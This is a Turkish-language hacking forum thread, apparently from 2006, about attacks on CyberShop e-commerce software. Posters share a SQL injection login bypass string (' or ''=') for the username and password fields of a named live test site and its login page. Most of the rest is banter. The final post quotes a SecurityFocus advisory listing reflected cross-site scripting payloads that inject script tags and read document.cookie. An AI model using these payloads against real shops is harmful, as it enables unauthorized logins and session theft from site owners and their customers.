CyberShop User Login Sql Injection

[FoReWeR]

##CyberShop User Login Sql Injection
##Site:http://www.gencbeyin.gen.tr/cybershop/test

Giri$ yapabiLmek için kod;

Username : ' or ''='
Password: ' or ''='

 

[DuyguSeli]

##CyberShop User Login Sql Injection
##Site:http://www.gencbeyin.gen.tr/cybershop/test

Giri$ yapabiLmek için kod;

Username : ' or ''='
Password: ' or ''='

http://www.gencbeyin.gen.tr/cybershop/test/uye/giris_yap.asp

adamlar manyak yapmışlar

2006'ya girdik hala enjeksiyonla ugrasiyorsunuz, yok ....

 

[ivesa]

birşey anlamadım ? nedir bu

 

[night_warrior]

Kardeşim Bunları yazıyotsunuzda kim bulmuş hiç yazıyormusunuz
bifr bulanı yazsanaız olmazmı?

 

[hackereha]

2006'ya girdik hala enjeksiyonla ugrasiyorsunuz, yok ....
zuhahahaha.........

 

[taner_erkan]

=) napalım ki? ben daha acemiyim öğrendemen bi üste geçemem ki

 

[Serqan]

Security siteLerini takip etmeniz dileğiyle.. is not sql injection :]

CyberShop Ultimate E-commerce Multiple Cross-Site Scripting Vulnerabilities

Credit : B3g0k

Contact : irc.gigachat.net #kurdhack

Published : Feb 02 2006 12:00AM

http://www.securityfocus.com/bid/16473

Example :


http://www.example.com/default.asp?gb=urun&id=18&ortak="<h1>Patriotic%20Hackers<h1>


http://www.example.com/default.asp?gb=kate&kat=<script>alert(document.cookie</script>&ortak=


http://www.example.com/default.asp?gb=kate&kat=<script>alert(document.title)</script>&ortak=


http://www.example.com/default.asp?gb=kate&kat=AnaKart&ortak="><script>alert(document.cookie)</script>